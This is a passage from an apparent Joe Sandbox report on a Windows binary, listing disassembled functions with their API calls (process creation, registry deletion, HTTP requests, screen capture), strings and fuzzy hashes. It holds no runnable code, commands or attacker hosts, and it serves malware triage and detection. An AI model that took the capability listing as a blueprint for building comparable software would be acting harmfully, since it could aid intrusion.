Part of subcall function 00A1045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A10510

___scrt_fastfail.LIBCMT ref: 00A10457

Part of subcall function 00A10413: __onexit.LIBCMT ref: 00A10419

Strings

kernel32.dll, xrefs: 00A104A3
InitializeConditionVariable, xrefs: 00A104B8
SleepConditionVariableCS, xrefs: 00A104C4
WakeAllConditionVariable, xrefs: 00A104D2
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A10492

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 495cb9d350ea94fa71d8026c3133726e1a7957a025f672e1bfb326eb899e7e56
Instruction ID: c0a698badd02d9dfa4431cf4af3cde444c20401e2eae5026b338bde9aa4460a4
Opcode Fuzzy Hash: 495cb9d350ea94fa71d8026c3133726e1a7957a025f672e1bfb326eb899e7e56
Instruction Fuzzy Hash: 9321C532744714BFD710ABE4AD4AFA937D5EF05BA1F004629F905D62C0DBB498C18B50

Function 00A53A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A53AD9
_wcslen.LIBCMT ref: 00A53B44

Strings

INSTANCE, xrefs: 00A53D9F
REGEXPCLASS, xrefs: 00A53BA1, 00A53BB2
TEXT, xrefs: 00A53DC8
CLASS, xrefs: 00A53AD4, 00A53AF1
CLASSNN, xrefs: 00A53B3F, 00A53B50
NAME, xrefs: 00A53C81, 00A53C92

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: dd701b9e4f626c0daf69d3fbe5da7620223a364c33feab7cc671f6c8976019d8
Instruction ID: a7fc58b8f6de1d3c9cede529dd38baabd6dd5316dc7de8599895fb100341c5b6
Opcode Fuzzy Hash: dd701b9e4f626c0daf69d3fbe5da7620223a364c33feab7cc671f6c8976019d8
Instruction Fuzzy Hash: 26E1D233A00516ABCF189FB8C8416EEFBB5BF94791F104129ED56E7250DB30AE9D8790

Function 00A64F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00A8DCD0), ref: 00A64F6C
_wcslen.LIBCMT ref: 00A64F80
_wcslen.LIBCMT ref: 00A64FDE
_wcslen.LIBCMT ref: 00A65039
_wcslen.LIBCMT ref: 00A65084
_wcslen.LIBCMT ref: 00A650EC

Part of subcall function 00A0FD52: _wcslen.LIBCMT ref: 00A0FD5D

GetDriveTypeW.KERNEL32(?,00AB7C10,00000061), ref: 00A65188

Strings

network, xrefs: 00A650E2, 00A650E7
ramdisk, xrefs: 00A65136
fixed, xrefs: 00A6507A, 00A6507F
removable, xrefs: 00A6502F, 00A65034
all, xrefs: 00A64F76, 00A64F7B
cdrom, xrefs: 00A64FD4, 00A64FD9
unknown, xrefs: 00A6514D

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 0a17d04719771045d7478b69dbac3a2409b4977683e0205dcda89eda2eb885c0
Instruction ID: f785ce112ddbacac97d904767ddca83fc500a2de6c9a9d5eb16ab1f721f25954
Opcode Fuzzy Hash: 0a17d04719771045d7478b69dbac3a2409b4977683e0205dcda89eda2eb885c0
Instruction Fuzzy Hash: BDB1C271A087029FC714EF38C890A7EB7F5AFA5724F50491DF59687292D770D884CB92

Function 00A89B7A Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 009F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009F24B0

DragQueryPoint.SHELL32(?,?), ref: 00A89BA3

Part of subcall function 00A880AE: ClientToScreen.USER32(?,?), ref: 00A880D4
Part of subcall function 00A880AE: GetWindowRect.USER32(?,?), ref: 00A8814A
Part of subcall function 00A880AE: PtInRect.USER32(?,?,?), ref: 00A8815A

SendMessageW.USER32(?,000000B0,?,?), ref: 00A89C0C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A89C17
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A89C3A
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A89C81
SendMessageW.USER32(?,000000B0,?,?), ref: 00A89C9A
SendMessageW.USER32(?,000000B1,?,?), ref: 00A89CB1
SendMessageW.USER32(?,000000B1,?,?), ref: 00A89CD3
DragFinish.SHELL32(?), ref: 00A89CDA
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00A89DCD

Strings

p6, xrefs: 00A89D17
@GUI_DRAGID, xrefs: 00A89D45
@GUI_DRAGFILE, xrefs: 00A89D7C
@GUI_DROPID, xrefs: 00A89CFA

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p6
API String ID: 221274066-1876975674
Opcode ID: 8291abd390a109ba4c02a9f8b237172a00c84e4ea09987597b7747b2ac318a50
Instruction ID: c1b62a84508ee2b012b6a5533950d5491f05614cecb70e5c9988b8d040ef06e3
Opcode Fuzzy Hash: 8291abd390a109ba4c02a9f8b237172a00c84e4ea09987597b7747b2ac318a50
Instruction Fuzzy Hash: C5615571108305AFC701EFA4DC85EAFBBE9FFC8760F40091DB695961A1DB709A4ACB52

Function 00A7BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A7BBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A7BC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A7BC34
_wcslen.LIBCMT ref: 00A7BC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A7BC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A7BC96
_wcslen.LIBCMT ref: 00A7BD92

Part of subcall function 00A60F4E: GetStdHandle.KERNEL32(000000F6), ref: 00A60F6D

_wcslen.LIBCMT ref: 00A7BDAB
_wcslen.LIBCMT ref: 00A7BDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A7BE16
GetLastError.KERNEL32(00000000), ref: 00A7BE67
CloseHandle.KERNEL32(?), ref: 00A7BE99
CloseHandle.KERNEL32(00000000), ref: 00A7BEAA
CloseHandle.KERNEL32(00000000), ref: 00A7BEBC
CloseHandle.KERNEL32(00000000), ref: 00A7BECE
CloseHandle.KERNEL32(?), ref: 00A7BF43

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: aac9e67d1ed4ca79e002430f0ab17c0f71bc1aec96b546c44bbf19258ed6802c
Instruction ID: 2962a116d88cf6cde5f47ca392e44102159ca88142f5689dc35a3dc3456e2cdb
Opcode Fuzzy Hash: aac9e67d1ed4ca79e002430f0ab17c0f71bc1aec96b546c44bbf19258ed6802c
Instruction Fuzzy Hash: D7F19DB16143049FC714EF24C991B6BBBE5AF85314F14C95DF9898B2A2CB70EC45CBA2

Function 00A74A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A8DCD0), ref: 00A74B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00A74B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00A8DCD0), ref: 00A74B4F
FreeLibrary.KERNEL32(00000000,?,00A8DCD0), ref: 00A74B9B
StringFromGUID2.OLE32(?,?,00000028,?,00A8DCD0), ref: 00A74C05
SysFreeString.OLEAUT32(00000009), ref: 00A74CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00A74D25
SysFreeString.OLEAUT32(?), ref: 00A74D4F

Strings

kernel32.dll, xrefs: 00A74B13
GetModuleHandleExW, xrefs: 00A74B24

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: e5d3109ff6dfae177e3c468ea39242709a1b9178eb6b30d62e52c80d3e2df688
Instruction ID: d79cc5be5439a48ad9d3a4a2c4ea500e845f0d8d0aea478de978e6639dab2d61
Opcode Fuzzy Hash: e5d3109ff6dfae177e3c468ea39242709a1b9178eb6b30d62e52c80d3e2df688
Instruction Fuzzy Hash: B1122B71A00119EFDB14DF94C884EAEBBB9FF89714F24C098E9499B251D731ED46CBA0

Function 009F381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00AC29C0), ref: 00A33F72
GetMenuItemCount.USER32(00AC29C0), ref: 00A34022
GetCursorPos.USER32(?), ref: 00A34066
SetForegroundWindow.USER32(00000000), ref: 00A3406F
TrackPopupMenuEx.USER32(00AC29C0,00000000,?,00000000,00000000,00000000), ref: 00A34082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A3408E

Strings

0, xrefs: 009F382D

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 59106f00f295729f063a2149c288a14217aa4e8b953a7e5030d9475d414c5c23
Instruction ID: ecc2d2063a841d9fdf3a41fe3cad78e9775a205c08613106b9fce3c60c74d11d
Opcode Fuzzy Hash: 59106f00f295729f063a2149c288a14217aa4e8b953a7e5030d9475d414c5c23
Instruction Fuzzy Hash: DD710731A48305BFEB259F68DC49FAABF65FF05368F104216F624AA1E0C7B9AD10D750

Function 00A87711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00A87823

Part of subcall function 009F8577: _wcslen.LIBCMT ref: 009F858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A87897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A878B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A878CC
DestroyWindow.USER32(?), ref: 00A878ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,009F0000,00000000), ref: 00A8791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A87935
GetDesktopWindow.USER32 ref: 00A8794E
GetWindowRect.USER32(00000000), ref: 00A87955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A8796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A87985

Part of subcall function 009F2234: GetWindowLongW.USER32(?,000000EB), ref: 009F2242

Strings

tooltips_class32, xrefs: 00A87890, 00A87915
0, xrefs: 00A877D0

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: b7a2f906a06bd6504e4bc5f706e0eea58aa51ec5e233ec32ed591ad3afab1133
Instruction ID: c1dbe7278fb02bfb53c0c437b2041182b34432e93dbeab654b55ac056fbb6579
Opcode Fuzzy Hash: b7a2f906a06bd6504e4bc5f706e0eea58aa51ec5e233ec32ed591ad3afab1133
Instruction Fuzzy Hash: 80718870108244AFD725EF58CC48F6ABBF9FB89304F24456EF985872A1CB70E956DB11

Function 00A6CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A6CEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A6CF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A6CF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A6CF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00A6CF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A6CF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A6CF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A6CFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A6D021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A6D035
InternetCloseHandle.WININET(00000000), ref: 00A6D040

Strings

, xrefs: 00A6CFBA

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 162a4512f1d9b05c509f542cb5ac1f5a62a4dcb9577c16e4fee9a199193d3141
Instruction ID: 2e04589f2ba1e6c199ef52ae16f331d151e65d8695cc7df5bf5ad5699a3eef58
Opcode Fuzzy Hash: 162a4512f1d9b05c509f542cb5ac1f5a62a4dcb9577c16e4fee9a199193d3141
Instruction Fuzzy Hash: 16515DB1A00704BFDB21DFA0CD88ABB7BBCFF08794F00441AF94696250D735D946ABA0

Function 00A88FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00A866D6,?,?), ref: 00A88FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00A866D6,?,?,00000000,?), ref: 00A88FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00A866D6,?,?,00000000,?), ref: 00A89009
CloseHandle.KERNEL32(00000000,?,?,?,?,00A866D6,?,?,00000000,?), ref: 00A89016
GlobalLock.KERNEL32(00000000), ref: 00A89024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A866D6,?,?,00000000,?), ref: 00A89033
GlobalUnlock.KERNEL32(00000000), ref: 00A8903C
CloseHandle.KERNEL32(00000000,?,?,?,?,00A866D6,?,?,00000000,?), ref: 00A89043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A866D6,?,?,00000000,?), ref: 00A89054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00A90C04,?), ref: 00A8906D
GlobalFree.KERNEL32(00000000), ref: 00A8907D
GetObjectW.GDI32(00000000,00000018,?), ref: 00A8909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00A890CD
DeleteObject.GDI32(00000000), ref: 00A890F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A8910B

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 5d06fa278fa480abd1d210b634affb70428975fb8e754d0f16b277f561ad5573
Instruction ID: ef0f7f9b0930841dd8bde188b1bf68768b57b6fd5527f77ab36a6cdd681260b7
Opcode Fuzzy Hash: 5d06fa278fa480abd1d210b634affb70428975fb8e754d0f16b277f561ad5573
Instruction Fuzzy Hash: F3411875600208BFDB11EFA5DC88EAB7BB9FF89715F144058F905DB2A0D7709942DB20

Function 00A7C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

Part of subcall function 00A7D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A7C10E,?,?), ref: 00A7D415
Part of subcall function 00A7D3F8: _wcslen.LIBCMT ref: 00A7D451
Part of subcall function 00A7D3F8: _wcslen.LIBCMT ref: 00A7D4C8
Part of subcall function 00A7D3F8: _wcslen.LIBCMT ref: 00A7D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7C154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A7C1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 00A7C26A
RegCloseKey.ADVAPI32(?), ref: 00A7C2DE
RegCloseKey.ADVAPI32(?), ref: 00A7C2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A7C352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A7C364
RegDeleteKeyW.ADVAPI32(?,?), ref: 00A7C382
FreeLibrary.KERNEL32(00000000), ref: 00A7C3E3
RegCloseKey.ADVAPI32(00000000), ref: 00A7C3F4

Strings

advapi32.dll, xrefs: 00A7C34D
RegDeleteKeyExW, xrefs: 00A7C35E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 891b94ce27317249685dc2699a95e798c183f9a32faa21830570a73d9c771efc
Instruction ID: 507c33a0ac0c7eac9248691bdc0f7fab4faf8d29760f7fc779f7c9a9ae3dbd9b
Opcode Fuzzy Hash: 891b94ce27317249685dc2699a95e798c183f9a32faa21830570a73d9c771efc
Instruction Fuzzy Hash: F7C19D31204201AFD710DF64C894F6ABBE5BF84324F54C59CF5AA8B2A2CB35ED46CB91

Function 00A72FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00A73035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00A73045
CreateCompatibleDC.GDI32(?), ref: 00A73051
SelectObject.GDI32(00000000,?), ref: 00A7305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00A730CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00A73109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00A7312D
SelectObject.GDI32(?,?), ref: 00A73135
DeleteObject.GDI32(?), ref: 00A7313E
DeleteDC.GDI32(?), ref: 00A73145
ReleaseDC.USER32(00000000,?), ref: 00A73150

Strings

(, xrefs: 00A730EA

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: f269e2af1893ec9072184fa022179c33fb909a9fba80839dc6b72574a9576ac6
Instruction ID: ef64c4f15c2c289f0ebd64048f89839ce6c099c677c933be37ed9897784bb516
Opcode Fuzzy Hash: f269e2af1893ec9072184fa022179c33fb909a9fba80839dc6b72574a9576ac6
Instruction Fuzzy Hash: 7F61C176D00219AFCF04CFA4DD84EAEBBB6FF48310F208529E559A7250D775A941DF90

Function 00A8A94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009F24B0

GetSystemMetrics.USER32(0000000F), ref: 00A8A990
GetSystemMetrics.USER32(00000011), ref: 00A8A9A7
GetSystemMetrics.USER32(00000004), ref: 00A8A9B3
GetSystemMetrics.USER32(0000000F), ref: 00A8A9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00A8AC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A8AC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A8AC54
ShowWindow.USER32(00000003,00000000), ref: 00A8AC73
InvalidateRect.USER32(?,00000000,00000001), ref: 00A8AC95
DefDlgProcW.USER32(?,00000005,?), ref: 00A8ACBB

Strings

@, xrefs: 00A8ABD0

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

